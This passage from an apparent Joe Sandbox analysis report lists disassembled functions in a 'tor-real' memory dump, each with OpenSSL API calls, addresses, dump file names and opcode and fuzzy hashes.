                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_pop_freeO_freeR_put_errorX509_free__stack_chk_fail
                                                                            • String ID: 2
                                                                            • API String ID: 826722838-450215437
                                                                            • Opcode ID: 0a723b1a56103af8aa8d49724bef4b387c310ce5fc56b8c238366e3c412d6679
                                                                            • Instruction ID: 660ccae3c831853611a4b1e2846b27b5ac5a0f4a73f51669e80559378ef305fd
                                                                            • Opcode Fuzzy Hash: 0a723b1a56103af8aa8d49724bef4b387c310ce5fc56b8c238366e3c412d6679
                                                                            • Instruction Fuzzy Hash: B7F0F8B16497008FD304AF65D98139EFBF0FB8A758F90882DE0D857640CB79A50A9F87
                                                                            Function 6C0D8514 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0D84ED
                                                                            • X509_NAME_free.LIBCRYPTO-1_1 ref: 6C0D84F5
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0D85FB
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1(?,?,?,?,6C0BE5B6), ref: 6C0D8621
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: E_freeL_sk_numL_sk_pop_freeR_put_errorX509___stack_chk_fail
                                                                            • String ID: 2
                                                                            • API String ID: 1899696362-450215437
                                                                            • Opcode ID: 9947369612585f70d6d975a9805d57397a16c2a049868f1dc8ab9d8231e1c260
                                                                            • Instruction ID: 95abea9250945e579aedb0247ceebc01afd25fdbeda658f9fb8b1026225504e2
                                                                            • Opcode Fuzzy Hash: 9947369612585f70d6d975a9805d57397a16c2a049868f1dc8ab9d8231e1c260
                                                                            • Instruction Fuzzy Hash: 54F0D4B21487048EC340AF55D04536EFBF0FF88758F52890EE1D957650C779A149DB87
                                                                            Function 6C0A0826 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0A0869
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0A0A05
                                                                            • EVP_MD_CTX_new.LIBCRYPTO-1_1 ref: 6C0A0A56
                                                                            • EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 6C0A0A88
                                                                            • strlen.MSVCRT ref: 6C0A0AA3
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0A0AB7
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0A0ADA
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0A0AFF
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0A0B24
                                                                            • EVP_DigestFinal_ex.LIBCRYPTO-1_1 ref: 6C0A0B40
                                                                            • EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 6C0A0B68
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0A0B8B
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0A0BA7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Digest$Update$Init_ex$Final_exR_put_errorX_freeX_new__stack_chk_failstrlen
                                                                            • String ID: D$P
                                                                            • API String ID: 333687674-307317852
                                                                            • Opcode ID: bf74b6505c2d807eb0e6821be56d70f1574459b8b0bc838d3e8aa8b4cb8610dd
                                                                            • Instruction ID: a6af8e564226aef575fde2c456fc1621fd9f891718b2f163ab0447c822fb434b
                                                                            • Opcode Fuzzy Hash: bf74b6505c2d807eb0e6821be56d70f1574459b8b0bc838d3e8aa8b4cb8610dd
                                                                            • Instruction Fuzzy Hash: 40F0D4B15087048FC740DFA4D88139BBBF0FB8435CF01891DE1A957640C774A549CF82
                                                                            Function 6C0D84AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0D84ED
                                                                            • X509_NAME_free.LIBCRYPTO-1_1 ref: 6C0D84F5
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0D85FB
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1(?,?,?,?,6C0BE5B6), ref: 6C0D8621
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: E_freeL_sk_numL_sk_pop_freeR_put_errorX509___stack_chk_fail
                                                                            • String ID: 2
                                                                            • API String ID: 1899696362-450215437
                                                                            • Opcode ID: 551d9061be515ab389bf95ea3042e9e9da62293e8f905f09686790ccd9d59fea
                                                                            • Instruction ID: f7c7e6b6c63025dccb20f30b7b595f21983ee23553ea0c53c56f4e5beb78175c
                                                                            • Opcode Fuzzy Hash: 551d9061be515ab389bf95ea3042e9e9da62293e8f905f09686790ccd9d59fea
                                                                            • Instruction Fuzzy Hash: A0F0D4B21487049EC340AF51D04536EFBF0FF88758F52890EE1D957640C775A049DB87
                                                                            Function 6C0B2973 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B299F
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B29CB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error
                                                                            • String ID: A
                                                                            • API String ID: 1767461275-3554254475
                                                                            • Opcode ID: 6f50c7a186075812321a43fbb562b7eccbfd7bb0b81b5122d3a624c37fa0fb20
                                                                            • Instruction ID: 279b401413a18919a95df32738d113197ece3edfce06ab08565258667a800eaf
                                                                            • Opcode Fuzzy Hash: 6f50c7a186075812321a43fbb562b7eccbfd7bb0b81b5122d3a624c37fa0fb20
                                                                            • Instruction Fuzzy Hash: D0F0A5B12093059FE3009F91E44539BBBE0BB80358F10891DE5E81B650C7BD95889F97
                                                                            Function 6C0940D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OPENSSL_sk_free.LIBCRYPTO-1_1 ref: 6C0940C8
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C094107
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_freeR_put_error
                                                                            • String ID: R
                                                                            • API String ID: 2647299623-1466425173
                                                                            • Opcode ID: ce30a5f904ef9a446c1ee4fe877651eda22bd084ce21b6ea036fe32392d5d14d
                                                                            • Instruction ID: d17afbc77cfa001655bd545b824a713a9feb2696dfab32c8801d70ff4ec1d9fd
                                                                            • Opcode Fuzzy Hash: ce30a5f904ef9a446c1ee4fe877651eda22bd084ce21b6ea036fe32392d5d14d
                                                                            • Instruction Fuzzy Hash: 07E01AB6A083009FD7009F54D84038ABBE0FBC5329F45882DE59847750C3B9A5498F46
                                                                            Function 6C0E0F01 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0E0F0B
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_errorY_free
                                                                            • String ID: D$P
                                                                            • API String ID: 3485142574-307317852
                                                                            • Opcode ID: 5160445259557b51f5ea7c915fe9796139005af299a7b5d11fc56a261a531835
                                                                            • Instruction ID: 40c41c29c13e46fd9a7660f7c4edcbbc81afdb747701afd3d07b74a69c587e20
                                                                            • Opcode Fuzzy Hash: 5160445259557b51f5ea7c915fe9796139005af299a7b5d11fc56a261a531835
                                                                            • Instruction Fuzzy Hash: A2E012B22087108BD3009F54E84038EBBE0EB84719F11882EE29857700CBB995488BC3
                                                                            Function 6C094B93 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C094BBF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error
                                                                            • String ID: A$b
                                                                            • API String ID: 1767461275-3696090935
                                                                            • Opcode ID: 7f4742fd1356ecfe5c6522db9ba809a694d260ba996ae6c9d07f59f7fbaaf270
                                                                            • Instruction ID: 639c9a52b0ce1bd13145a9dbab607bd76b287635173296687e1d4fff3e09d921
                                                                            • Opcode Fuzzy Hash: 7f4742fd1356ecfe5c6522db9ba809a694d260ba996ae6c9d07f59f7fbaaf270
                                                                            • Instruction Fuzzy Hash: 11E0C2B2108301CEE3008F55E40438AB7D0FBC0314F00C82DE1AC07610C3BA51888B56
                                                                            Function 6C0BA753 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C0AAD12), ref: 6C0BA781
                                                                            • BIO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C0AAD12), ref: 6C0BA789
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeR_put_error
                                                                            • String ID: |
                                                                            • API String ID: 3735976985-2343686810
                                                                            • Opcode ID: de6928c92091fe54a785d7fd4c893fcce128f8904ff430487e01bcdc1fdd9ab3
                                                                            • Instruction ID: 842ae631a9fedd6c881c872419498a057e725c428f3835648ad356867baf5b71
                                                                            • Opcode Fuzzy Hash: de6928c92091fe54a785d7fd4c893fcce128f8904ff430487e01bcdc1fdd9ab3
                                                                            • Instruction Fuzzy Hash: C1E0ECB25083158FE3109F58E44435BFBE0AB84359F01891DD1D857750C779A5488BC6
                                                                            Function 6C094CE7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C094D17
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error
                                                                            • String ID: A$b
                                                                            • API String ID: 1767461275-3696090935
                                                                            • Opcode ID: a7bfcf66838acb6538b3156eb8e193717993687c6c8e8da1efb7831251fdc108
                                                                            • Instruction ID: 8ab278df7da336a75fe27ff088e877453dbc9c44011340ff3d35aec496a2c962
                                                                            • Opcode Fuzzy Hash: a7bfcf66838acb6538b3156eb8e193717993687c6c8e8da1efb7831251fdc108
                                                                            • Instruction Fuzzy Hash: C5D05EB2108305CEE7009FA1E40438BBBE0FB80318F00881DD5DC47250D3BA51988B56
                                                                            Function 6C0E094C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0E0979
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error
                                                                            • String ID: &$D
                                                                            • API String ID: 1767461275-1138263919
                                                                            • Opcode ID: bb272e1091a3bf9b4c4eb0664ac93c21f81e75349c03af7144b9e78e8d7f246d
                                                                            • Instruction ID: 3254d1b0992aee3e6862244c08339c76b95cb92d3468a0c9eda79a315d1141a6
                                                                            • Opcode Fuzzy Hash: bb272e1091a3bf9b4c4eb0664ac93c21f81e75349c03af7144b9e78e8d7f246d
                                                                            • Instruction Fuzzy Hash: 0BD017B26083158FD7008F84E40538AFBE0EB80318F00882DE69857750C7B995088B8A
                                                                            Function 6C094E89 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C094EB7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error
                                                                            • String ID: A$b
                                                                            • API String ID: 1767461275-3696090935
                                                                            • Opcode ID: 6a63e742fcf99e9c4c61edb0920662329d15cd666acff80495b28b9f9de71389
                                                                            • Instruction ID: 82ee535f7d23be2288cb4654e67cde193a8ea622e6d5bcaf707f670332405081
                                                                            • Opcode Fuzzy Hash: 6a63e742fcf99e9c4c61edb0920662329d15cd666acff80495b28b9f9de71389
                                                                            • Instruction Fuzzy Hash: D3D05EF1008301DFE704CF51C40538ABBE1BBC0314F14C80CE4E80B350C7BA55989B56
                                                                            Function 6C0D2419 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0D2447
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error
                                                                            • String ID: ?$A
                                                                            • API String ID: 1767461275-541453087
